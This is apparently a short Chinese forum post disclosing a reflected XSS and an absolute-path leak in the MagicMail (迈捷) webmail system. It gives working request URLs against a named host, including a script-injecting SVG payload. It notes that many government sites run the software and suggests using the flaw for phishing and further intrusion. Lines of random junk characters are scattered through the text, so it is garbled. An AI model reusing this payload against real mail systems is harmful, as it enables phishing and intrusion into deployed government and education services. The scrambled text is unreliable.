今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
0 H& L: @/ H. M; ^" u: T! d2 T
" Y1 X6 [& ^3 l0 \/ N# C
, b! Y* F8 u v- w! W# D包含 一个反射性XSS 以及 绝对路径泄漏0 k6 x2 i, G5 ^. M5 u7 U' B
看了看 貌似全部是linux的。7 y9 |& F# W, a2 c t& B
/ G- H4 Z# |# ?$ P- k( X关键字:迈捷邮件系统 by MagicMail2 }+ ]& u2 Z7 l6 y
+ E2 j) O1 \* f8 z% p; @( O可以看到很多政府网站都用这个邮件系统
6 {8 x V8 u- q/ D! ^% L5 E* M# ^ B
绝对路径 http://madman.in/index.php?login_type=declare&language=6 s2 t; c& l% Z: F2 t/ B
W/ e3 c9 J5 n5 p) J! t8 A( s* E0 {" \1 ~
$ O! d) r2 S! J+ U/ q/ W
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
/ ]; f3 _5 w4 U8 _
& I3 d2 @% u0 F7 Q6 o( x+ d- N2 L" V( ~# M
- ^7 H) {8 o) Q7 f0 K ?- `1 t
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
V8 X' G3 a+ \% \. E8 i 5 Q) H) B, i- j2 S& z
修复方案:看官方补丁吧。
& d D* [/ _$ o! N) R& u2 M |